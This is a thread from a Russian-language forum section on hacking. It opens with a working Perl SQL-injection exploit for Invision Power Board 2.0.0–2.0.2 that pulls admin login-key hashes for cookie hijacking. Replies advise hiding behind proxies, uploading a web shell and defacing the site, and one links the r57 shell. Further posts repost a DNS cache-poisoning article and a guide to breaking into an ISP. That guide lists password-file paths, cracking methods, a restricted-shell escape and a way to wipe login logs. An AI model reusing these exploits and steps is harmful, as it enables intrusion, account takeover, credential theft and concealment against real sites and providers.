## [>]    SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX: ibf_
## [>]     ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
## [+] CONNECTED
## [~] SENDING QUERY...
## [+] DONE!
##
## --[ REPORT ]------------------------------------------------------------------------------------
## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e]
## ------------------------------------------------------------------------------------------------
## Now you need edit cookie and insert new pass_hash and member_id values.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Пару слов о возвращаемом эксплоитом результате:
## Значение pass_hash это не зашифрованный пароль юзера!!! а одноименное значение из кукиса с
## помощью которого можно войти на форум под любым юзером без ввода пароля.
## member_id это также одноименное значение из кукиса.
## Поэтому не стоит пытаться расшифровать pass_hash =) Просто зарегистрируйтесь на форуме и измените
## pass_hash и member_id в вашем cookie на одно из значений которые выдаст сплоит.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 5)
{
print "-------------------------------------------------------------------------\r\n";
print "       Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "usage:\r\n";
print "r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\r\n\r\n";
print "SERVER         - server where IPB installed\r\n";
print "/DIR/          - IPB directory or / for no directory\r\n";
print "FORUM_NUM      - number of existing forum\r\n";
print "TOPIC_NUM      - number of existing topic\r\n";
print "SID            - your session id\r\n";
print "[TABLE_PREFIX] - table prefix in database\r\n";
print "[USER_ID]      - user id for exploiting\r\n\r\n";
print "e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0662d721c207f81784e ibf_\r\n";
print "-------------------------------------------------------------------------\r\n";
exit();
}

if (@ARGV < 6) { $get_table = 1; }

$server = $ARGV[0];
$dir    = $ARGV[1];
$fnum   = $ARGV[2];
$tnum   = $ARGV[3];
$sid    = $ARGV[4];
$prefix = $ARGV[5];
$id     = $ARGV[6];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>]  FORUM: $fnum\r\n";
print "[>]  TOPIC: $tnum\r\n";
print "[>]    SID: $sid\r\n";
print "[>] PREFIX: $prefix\r\n";
print "[>]     ID: $id\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= "index.php?s=";
$path .= $sid;
$path .= "&act=Post&CODE=02&f=";
$path .= $fnum;
$path .= "&t=";
$path .= $tnum;
if ($get_table == 1)
{
$path .= "&qpid=r57"
}
else
{
$path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20";
$path .= $prefix;
$path .= "members";
$path .= ($id)?("%20WHERE%20id=$id%20"):("%20");
$path .= "/*";
}
print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";                                                                                                                                                         
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";

$suc =0;

if ($get_table == 1)
{
while ($answer = <$socket>)
  {
  if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4\r\n"; $suc = 1; }
  }
if (!$suc) { print "Exploit failed\r\n"; }
exit();
}

print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~ /^([^:]*):([^:]*):([a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2] PASS_HASH: [$3]\r\n"; $suc = 1; }
}
print "------------------------------------------------------------------------------------------------\r\n";
if ($suc == 1) { print "Now you need edit cookie and insert new pass_hash and member_id values.\r\n"; exit(); }
else { print "Exploit failed\r\n"; }

25

Рэхмэт. Тут мне, конечно, придётся посидеть разобраться.  Попробую им жизнь осложнить. Чтобы грязью нас меньше поливали.

26

Используй прокси, установи перл, очисти старые куки до регестрации на сайте, когда будешь в админке лучше залить шели уже потом дефейсить и развлекаться

27

мой любимый шел
не забудь поменять расширение на пхп

http://rst.void.ru/download/r57shell.txt

28

Вот ышо стоться хак...
Атака на DNS или Ночной кошмар сетевого администратора

Являясь одним из основных элементов инфраструктуры IP-сетей, служба доменных имен (DNS) в то же время далеко неидеальна с точки зрения информационной безопасности. Применение транспортного протокола без установления виртуального канала (UDP), отсутствие встроенных средств идентификации, аутентификации и разграничения доступа делают ее уязвимой для удаленных атак различных типов.

В данной статье рассматривается межсегментная удаленная атака на DNS-сервер, не требующая выполнения каких либо жестких условий и допускающая эффективную практическую реализацию.
1. DNS с высоты птичьего полета

Служба доменных имен представляет собой распределенную базу данных, основным содержанием которой является информация о соответствии символических имен сетевых объектов их IP-адресам. DNS организована по иерархическому принципу. Структурной единицей этой базы является домен (domain), который в свою очередь может содержать другие домены (поддомены).

Первичным источником информации о каждом домене является ответственный за данный домен DNS-сервер (на самом деле их может быть несколько). Ответственность за часть доменной информации (поддомены) может быть делегирована другим серверам

Клиентская часть DNS называется резолвером (resolver), доступ к которому прикладные программы получают через API операционной системы. При взаимодействии резолвера с сервером в качестве транспортного протокола используется UDP, не предусматривающий формирования виртуального канала. Запросы, генерируемые резолвером, являются рекурсивными, т.е. в качестве ответа на такой запрос возвращается либо искомая информация, либо сообщение о ее отсутствии.

Получив запрос от резолвера, сервер либо сразу же возвращает ответ (при условии наличия искомой информации в локальной базе), либо формирует запрос к другому серверу. Этот запрос обычно является итеративным и, в отличие от рекурсивного, допускает ответ в виде ссылки на другой сервер, который лучше осведомлен о месте расположения искомой информации.

В общем случае поиск начинается с корневого сервера, который возвращает информацию о серверах, ответственных за домены верхнего уровня, после чего формируется новый итеративный запрос к одному из этих серверов и т.д. Результатом такой цепочки вопросов-ответов является либо получение искомой информации, либо вывод о ее отсутствии, после чего полученный ответ возвращается резолверу. Вся накопленная сервером в процессе работы информация кэшируется с целью ускорения обслуживания последующих запросов и минимизации сетевого трафика.
2. Межсегментная удаленная атака на DNS-сервер

Возможность атаки на DNS путем фальсификации ответа DNS-сервера известна довольно давно (см., например, Медведовский И.Д., Семьянов П.В., Платонов В.В. Атака через Internet. - СПб.: "Мир и семья-95", 1997.). Объектом атаки может являться как резолвер, так и DNS-сервер. Причины успеха подобных атак кроются в легкости подделки ответа сервера. Протоколы DNS, используемые в настоящее время, не предусматривают каких либо средств проверки аутентичности полученных данных и их источника, полностью полагаясь в этом на нижележащие протоколы транспортного уровня. Используемый транспортный протокол (UDP) с целью повышения эффективности не предусматривает установления виртуального канала и использует в качестве идентификатора источника сообщения IP-адрес, который может быть элементарно подделан.

При наличии у атакующего возможности перехвата сообщений, которыми обмениваются клиент и сервер (внутрисегментная атака) реализация атаки не представляет каких либо трудностей. Однако этот вариант не представляет и значительного практического интереса, поскольку возможность внутрисегментной атаки предполагает наличие определенного взаимного расположения клиента, сервера и хоста атакующего (например, атакующий и целевой DNS-сервер разделяют общую физическую среду передачи), что на практике реализуется довольно редко.

Значительно более общим случаем является межсегментная атака, не требующая для своей реализации столь жестких условий. По этой причине мы остановимся на рассмотрении именно этого класса удаленных атак, представляющих как академический, так и практический интерес.

Межсегментная атака на DNS-сервер выглядит следующим образом. Предположим для определенности, что целью атаки является "подмена" IP-адреса web-сервера wwwcoolsite.com на IP-адрес сервера wwwbadsite.com для пользователей некоторой подсети, которую обслуживает DNS-сервер ns.victim.com. В первой фазе атаки ns.victim.com провоцируется на поиск информации о IP-адресе wwwcoolsite.com путем посылки ему соответствующего рекурсивного запроса. Во второй фазе атакующий посылает серверу ns.victim.com ложный ответ от имени ns.coolsite.com, который является ответственным за домен coolsite.com. В ложном ответе вместо реального IP-адреса wwwcoolsite.com указывается IP-адрес wwwbadsite.com. Сервер ns.victim.com кэширует полученную информацию, в результате чего в течении определенного промежутка времени (величина этого промежутка указывается в поле TTL ложного ответа и может произвольно выбираться атакующим) ничего не подозревающие пользователи вместо сервера wwwcoolsite.com попадают на wwwbadsite.com.

Для того, чтобы ложный ответ был воспринят сервером ns.victim.com как истинный, достаточно выполнения четырех условий:
IP адрес отправителя ответа должен соответствовать IP-адресу запрашиваемого сервера (в нашем случае ns.coolsite.com);
UDP-порт, на который направляется ответ, должен совпадать с портом, с которого был послан запрос;
идентификатор ответа должен совпадать с идентификатором запроса;
ответ должен содержать запрашиваемую информацию (в нашем случае IP-адрес web-сервера wwwcoolsite.com).
Очевидно, что выполнение первого и четвертого условий не представляет для атакующего особых трудностей. Со вторым и третьим условиями ситуация намного сложнее, поскольку в случае межсегментной атаки у атакующего нет возможности перехватить исходный запрос и "подсмотреть" необходимые параметры.

Большинство используемых в настоящее время реализаций DNS-сервера (BIND4, MS DNS) используют для исходящих запросов 53 порт, так что можно "на удачу" послать ложный ответ на этот порт. Однако данный метод будет срабатывать не всегда, поскольку, например, BIND8 может использовать для исходящих запросов любой случайно выбранный непривилегированный порт.

Идентификатор (id) запроса представляет собой двухбайтовое число, указываемое сервером в запросе с целью однозначной идентификации ответа на данный запрос. Это число инкрементируется с каждым новым запросом. Незнание текущего значения идентификатора приводит к необходимости посылки множества ложных ответов с различными значениями id.

Именно это обстоятельство делает практическую реализацию данной атаки очень трудноосуществимой. Действительно, ложный ответ должен быть получен целевым сервером в промежуток времени с момента посылки запроса и до момента прихода ответа от настоящего сервера, что на практике составляет не более нескольких секунд. За этот интервал времени атакующему необходимо послать 216 ложных ответов со всеми возможными значениями id, а в случае незнания порта эта цифра увеличивается еще в несколько десятков раз. Поскольку размер IP-пакета, содержащего ложный ответ, составляет около 100 байт, то перед атакующим ставится задача пересылки нескольких мегабайт информации за несколько секунд, что в подавляющем большинстве случаев неосуществимо.
3. Метод определения номера порта и текущего идентификатора запроса

При выполнении дополнительного условия даже в случае межсегментной атаки у атакующего есть возможность определения текущего id запроса и номера порта. Таким условием является наличие контролируемого атакующим DNS-сервера, ответственного за любой домен. Контроль над сервером в данном контексте означает возможность перехвата всех запросов, адресованных данному серверу. Это возможно либо если атакующий непосредственно владеет сервером (является его администратором), либо разделяет с ним общую физическую среду передачи (в случае ethernet это означает нахождение в одном коллизионном домене). Очевидно, что данное условие не является слишком жестким, поскольку нахождение в одном коллизионном домене с DNS-сервером достаточно типично для многих пользователей корпоративных сетей.

При наличии контролируемого сервера описанная атака может быть модифицирована следующим образом. Предположим для определенности, что атакующий контролирует сервер ns.hacker.com, ответственный за домен hacker.com. В первой фазе атаки мы провоцируем сервер ns.victim.com на обращение к ns.hacker.com путем посылки рекурсивного запроса на поиск информации о любом имени (не обязательно реальном) в домене hacker.com. Поскольку ns.hacker.com находится под контролем атакующего, он может перехватить этот запрос и извлечь из него информацию о номере порта и текущем id.

Последующие две фазы атаки не отличаются от описанных, с той лишь разницей, что теперь атакующему достаточно послать всего несколько ложных ответов, поскольку он точно знает номер порта и может с высокой степенью точности предсказать значение идентификатора запроса к ns.coolsite.com.
4. Метод косвенной провокации

Очевидно, что необходимым условием успешности описанной атаки является возможность посылки рекурсивных запросов целевому серверу, провоцирующих его на обращение к другим серверам с целью поиска запрашиваемой информации. В принципе, существует возможность настроить DNS-сервер таким образом, что он будет принимать рекурсивные запросы только от "своих" клиентов (хостов, резолверы которых настроены на использование данного сервера). В этом случае осуществление атаки становится невозможным.

С целью обхода этого ограничения можно предложить простой метод, который условно назовем "косвенной провокацией". Основная идея этого метода заключается в использовании любого общедоступного сервиса, являющегося клиентом целевого DNS-сервера, для формирования необходимого провоцирующего запроса. Наиболее подходящим кандидатом представляется общедоступный сервер электронной почты, который по определению должен принимать соединения с любого компьютера Internet. Предположим, что резолвер компьютера mail.victim.com настроен на использование сервера ns.victim.com, причем последний принимает рекурсивные запросы только от домена victim.com. Приведенный ниже SMTP-диалог провоцирует ns.victim.com на поиск информации о имени any-name.any-domain.com:
$ telnet mail.victim.com 25
Trying...
Connected to mail.victim.com.
Escape character is '^]'.
220 mail.victim.com ESMTP Sendmail 8.8.0/8.8.0; Wed, 5 May 1999 21:30:42
helo I.am.cracker
250 mail.victim.com Hello crack.hacker.com [1.1.1.1], pleased to meet you
mail from: user@any-name.any-domain.com
250 user@any-name.any-domain.com... Sender ok
quit
221 mail.victim.com closing connection
Connection closed.
Таким образом, применение метода "косвенной провокации" позволяет осуществить атаку без прямой посылки запросов целевому DNS-серверу.
5. Как возникают эпидемии

В обычных условия успешная атака приводит к "заражению" кэша конкретного сервера и область распространения ложной информации ограничивается только его клиентами. Однако при наличии ситуации "некорректного делегирования" (lame delegation), возникающей из-за ошибок администрирования, возможно распространение ложной информации на другие сервера, что приведет к глобальному "заражению".

Под некорректным делегированием понимается ситуация, когда ответственность за домен делегируется серверу, не обладающему локальной копией доменной информации. Это приводит к тому, что в ответ на итеративные запросы других серверов вместо искомой информации он возвращает ссылки на другие сервера (иногда и на себя), которые, с точки зрения данного сервера, располагают нужными сведениями.

Рассмотрим ситуацию, когда для домена victim.com существуют два ответственных сервера - ns.victim.com и ns2.victim.com, причем для ns2.victim.com делегирование выполнено некорректно. Применяя описанные методы, атакующий может "заразить" кэш сервера ns2.victim.com ложной информацией о именах в домене victim.com, например, подменить IP-адрес web-сервера wwwvictim.com на IP-адрес wwwvery-bad-site.com. Поскольку ns2.victim.com считается ответственным за домен victim.com, другие сервера в Internet будут обращаться к нему за информацией о именах в этом домене. Не располагая локальной копией доменной информации о victim.com, данный сервер будет возвращать в ответ ранее кэшированную ложную информацию, приводя к "заражению" всех обратившихся к нему серверов.

Неприятной особенностью данного сценария является невозможность быстрой ликвидации последствий атаки, поскольку ложная информация будет находиться в кэшах тысяч серверов до истечения времени жизни, которое атакующий может выбрать очень большим.
6. Реализация и полевые испытания

Программа, реализующая атаку на DNS-сервер с использованием контролируемого сервера, стала доступна в Internet примерно в феврале 1999 года. К счастью, использование этой программы не сводится к вводу в окошко IP-адреса целевого сервера и нажатию кнопки "Infect It!", а требует достаточно глубокого понимания принципов работы DNS, что сразу же отсеивает 99% потенциальных пользователей. Кроме того, в известной автору реализации сделано далеко не все для повышения вероятности успеха атаки.

С целью обеспечения чистоты эксперимента "полевые испытания" были проведены на трех неподконтрольных автору корпоративных сетях. Естественно, администраторы этих сетей были поставлены в известность и не возражали против проведения эксперимента. Как это ни печально, во всех трех случаях атака была успешной.

Диапазон целей, которые могут быть достигнуты при помощи атаки на DNS, простирается от "отказа в обслуживании" и подмены web-сайтов до перехвата сообщений электронной почты и полного контроля над информацией, передаваемой между произвольно выбранными хостами Internet. При всем этом атакующий практически не оставляет следов, поскольку ему нет необходимости посылать провоцирующие запросы и ложные ответы с собственного IP-адреса.
7. Взгляд с другой стороны баррикады

По мнению автора, в настоящее время единственным надежным средством противодействия описанной атаке является использование стандартизированных в RFC2065 расширенных протоколов DNS, предусматривающих применение криптографических методов аутентификации доменной информации и субъектов сетевого взаимодействия. Базовая поддержка этого стандарта уже включена в текущую версию BIND8.

К сожалению, желаемый результат может дать только широкомасштабное внедрение новых протоколов, которое сопряжено со значительными организационными трудностями и не может быть проведено за короткое время.

Несколько затруднить осуществление атаки может запрет на обслуживание DNS-сервером рекурсивных запросов, поступающих не от "своих" клиентов. Это может быть сделано как средствами самого сервера (например, BIND8 обладает такими возможностями), так и средствами межсетевого экрана. Следует обратить внимание на настройку "антиспуффинговых" правил фильтрации на межсетевом экране, поскольку атакующий в качестве IP-адреса отправителя запроса может указать любой адрес, в том числе и легального клиента.

При использовании данного метода не следует забывать, что подобная защита может быть достаточно легко преодолена использованием описанного метода косвенной провокации.
Заключение

В отличие от уже набивших оскомину атак, использующих "дыры" в конкретных реализациях сетевых сервисов, ошибки администрирования или методы "социальной инженерии", атака на DNS представляется автору очень изящной.

В то же время по характеру и масштабности результатов данная атака вполне может быть причислена к информационному оружию массового поражения. Отсутствие адекватных средств защиты, очень слабо выраженные следы и трудность устранения последствий атаки еще больше усугубляют ситуацию.

Несколько удивляет тот факт, что данная удаленная атака широко не применяется взломщиками (по крайней мере, автор не располагает такой информацией). Вполне возможно, это объясняется просто недостаточной квалификацией подавляющего числа людей, называющих себя хакерами. Сетевым администраторам остается только надеяться, что уязвимость протоколов DNS к данной атаке будет устранена прежде, чем они почувствуют на себе ее последствия.

29

посидим в интернете на халяву!!!
   Ломаем своево провайдера!
Статья, пpедлагаемая вашему вниманию, может оказаться полезной только в том случае, если ваш пpовайдеp использует опеpационную систему UNIX, имеющую shell-доступ.

Если у вас нет UNIX-shell'a в сеpвеp пpовайдеpа, вы можете официально купить его или подобpать (только на слабо защищенных системах) паpоль (UNIX/UNIX; ROOT/ROOT; ADMIN/ADMIN; SHELL/SHELL; GUEST/GUEST и т.д.). Hа любом UNIXe (если не используется система специальной защиты) файл с паpолями находится в диpектоpии etc, в файле passwd. Файл, конечно, зашифpован и пpогpаммы для его обpатного декодиpования пpосто не существует, но есть дpугая возможность:
Кодиpовать слова (возможные паpоли) и сpавнивать получившийся кодиpованный ваpиант со всеми зашифpованными паpолями в файле passwd. Хакеpы создали пpогpаммы, делающие это автоматически, но для полноценной pаботы вам понадобится довольно быстpый компьютеp и хоpоший словаpь с возможными паpолями. Существует полный словаpь занимающий10 мегабайт дискового пpостpанства и помог вскpыть более 200 паpолей. Самая лучшая пpогpамма для дешифpации паpоля под UNIX была Crack Алека Муфетта, а под DOS - CrackerJack.

Hекотоpые пpовайдеpы используют систему скpытия паpолей, в этом случае вместо шифpованного паpоля можно будет увидеть что-то наподобии *, а настоящие шифpованные паpоли находятся в дpугом месте. Если вы имеете дело с таким пpовайдеpом, не pасстpаивайтесь, у вас все pавно есть шанс стать обладателем десяточка паpолей пользователей. Для начала попpобуйте поискать спpятанный файл с паpолями в следующих местах:

/etc/security/passwd
/tcb/auth/files/
<first letter of username>/<username>
/tcb/files/auth/?/
/etc/master.passwd
/etc/shadpw
/etc/shadow
/etc/tcb/aa/user/
/.secure/etc/passwd
/etc/passwd[.dir|.pag]
/etc/security/passwd.adjunct
##username
/etc/shadow
<optional NIS+ private secure maps/tables/whatever>
/etc/shadow
/etc/security/* database
/etc/auth[.dir|.pag]
/etc/udb

Hо может быть и так, что нужного pезультата от поиска в этих диpектоpиях вы не добьетесь. Тогда вам пpидется воспользоваться специально написанной пpогpаммой для отлова файла с паpолями. Эта пpогpамма, котоpая pаботает на многих системах (хотя не на всех). Пpогpамма называется getpwent (), ее исходник можно найти на сеpвеpе (wwwspider.ru) в pубpике "ХАКЕРЫ". Еще одна возможная непpиятность связанная с дешифpацией файла с паpолями может случится тогда, когда вы откpоете файл passwd и увидите там что-то похожее на: +::0:0:::. Это говоpит о том, что в системе использована система NIS(Network Information Server)/YP (Yelow Pages). Если у вас возникла такая пpоблема, то вам будет необходимо воспользоваться командой "ypcat passwd" для пpосмотpа настоящего файла с паpолями. Если вам пpидется доставать файл с паpолями под VMS, то попpобуйте посмотpеть SYS$SYSTEM:SYSUAF.DAT. Для взлома паpолей под VMS вам надо воспользоваться пpогpаммой CHECK_PASSWORD или GUESS_PASSWORD, а если у вас есть навыки пpогpаммиpования, то вам будет не сложно написать пpогpамму, котоpая будет сpавнивать кодиpованные слова из вашего словаpя с паpолями из файла.

Иногда для взлома пpовайдеpа тpебуется взломать огpаниченный shell-доступ. Для этого вам следует запустить пpогpамму vi и использовать эту команду: set shell=../../../../bin/sh, после чего shell использует следующую команду :shell. И так, если вам удалось выудить несколько паpолей пользователей из passwd, то вам следует "замести следы". Это делается довольно пpосто, вам надо будет отpедактиpовать файлы /etc/utmp, /usr/adm/wtmp, /usr/adm/lastlog. Пpавда эти файлы написаны не откpытым текстом и pуками пpи помощи vi отpедактиpовать вам его не получится, пpидется воспользоваться специальной пpогpаммой. найти её можно в любом поисковике например мой любимый Я.ру

Отредактировано Ринат (2006-08-17 19:03:35)

30

Лично мне последняя статья не понравилось. Много не дочетов
например почему листин именно по  ..\..\..\
ведь шел может быть в любой папке и узнать на скока верх сразу не скажешь
если используется бд и скрипт передачи данных находиться в каталоге шела или евл его подкаталогом можно вызвать ошибку отправив символ '
это вызовет ошибку и покажет адрес котолога
ну есть еще пару такиъх касякуов


Вы здесь » Дюртюлинский форум » Треш » Взломы и т.п.